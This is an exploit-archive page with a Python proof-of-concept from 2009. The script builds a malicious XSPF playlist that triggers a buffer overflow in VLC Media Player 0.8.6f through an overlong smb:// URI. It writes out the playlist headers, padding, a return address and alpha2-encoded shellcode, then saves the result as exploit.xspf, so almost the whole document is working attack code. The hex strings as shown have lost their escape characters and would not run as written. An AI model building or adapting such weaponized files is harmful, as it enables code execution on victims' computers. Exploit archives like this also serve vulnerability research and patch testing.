VLC Media Player 0.8.6f smb:// URI Handling Remote BOF Exploit (univ)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : VLC Media Player 0.8.6f smb:// URI Handling Remote BOF Exploit (univ)
# Published : 2009-07-31
# Author : His0k4
# Previous Title : SAP Business One 2005-A License Manager Remote BOF Exploit
# Next Title : VLC Media Player 0.8.6f smb:// URI Handling Remote BOF Exploit

#!/usr/bin/python
#[*] Exploit     :      	VLC Media Player 0.8.6f smb:// URI Handling Remote BOF Exploit (univ)
#[*] Credits	 :		Pankaj Kohli
#[*] Exploit     : 		His0k4


header1=(
"x3cx3fx78x6dx6cx20x76x65x72x73x69x6fx6ex3dx22x31"
"x2ex30x22x20x65x6ex63x6fx64x69x6ex67x3dx22x55x54"
"x46x2dx38x22x3fx3ex0ax3cx70x6cx61x79x6cx69x73x74"
"x20x76x65x72x73x69x6fx6ex3dx22x31x22x20x78x6dx6c"
"x6ex73x3dx22x68x74x74x70x3ax2fx2fx78x73x70x66x2e"
"x6fx72x67x2fx6ex73x2fx30x2fx22x20x78x6dx6cx6ex73"
"x3ax76x6cx63x3dx22x68x74x74x70x3ax2fx2fx77x77x77"
"x2ex76x69x64x65x6fx6cx61x6ex2ex6fx72x67x2fx76x6c"
"x63x2fx70x6cx61x79x6cx69x73x74x2fx6ex73x2fx30x2f"
"x22x3ex0ax09x3cx74x69x74x6cx65x3ex50x6cx61x79x6c"
"x69x73x74x3cx2fx74x69x74x6cx65x3ex0ax09x3cx74x72"
"x61x63x6bx4cx69x73x74x3ex0ax09x09x3cx74x72x61x63"
"x6bx3ex0ax09x09x09x3cx6cx6fx63x61x74x69x6fx6ex3e"
"x73x6dx62x3ax2fx2fx65x78x61x6dx70x6cx65x2ex63x6f"
"x6dx40x77x77x77x2ex65x78x61x6dx70x6cx65x2ex63x6f"
"x6dx2fx66x6fx6fx2fx23x7b")

header2=(
"x7dx3cx2fx6cx6fx63x61x74x69x6fx6ex3ex0ax09x09x09"
"x3cx65x78x74x65x6ex73x69x6fx6ex20x61x70x70x6cx69"
"x63x61x74x69x6fx6ex3dx22x68x74x74x70x3ax2fx2fx77"
"x77x77x2ex76x69x64x65x6fx6cx61x6ex2ex6fx72x67x2f"
"x76x6cx63x2fx70x6cx61x79x6cx69x73x74x2fx30x22x3e"
"x0ax09x09x09x09x3cx76x6cx63x3ax69x64x3ex30x3cx2f"
"x76x6cx63x3ax69x64x3ex0ax09x09x09x3cx2fx65x78x74"
"x65x6ex73x69x6fx6ex3ex0ax09x09x3cx2fx74x72x61x63"
"x6bx3ex0ax09x3cx2fx74x72x61x63x6bx4cx69x73x74x3e"
"x0ax3cx2fx70x6cx61x79x6cx69x73x74x3ex0ax0a")

#alpha2 encoded
popup_msg=(
"TY777777777777777777777777777777777QZjAXP0A0AkAAQ2AB2BB0"
"BBABXP8ABuJIXkweaHrJwpf02pQzePMhyzWwSuQnioXPOHuBxKnaQlkO"
"jpJHIvKOYokObPPwRN1uqt5PA")

payload =   header1
payload += "x41"*96
payload += "x4Ax21x51x68" # push esp;retn printable 
payload += popup_msg
payload += "x41"*43
payload += header2

try:
    out_file = open("exploit.xspf","w")
    out_file.write(payload)
    out_file.close()
    print("nExploit file created!n")
except:
    print "Error"

# www.Syue.com [2009-07-31]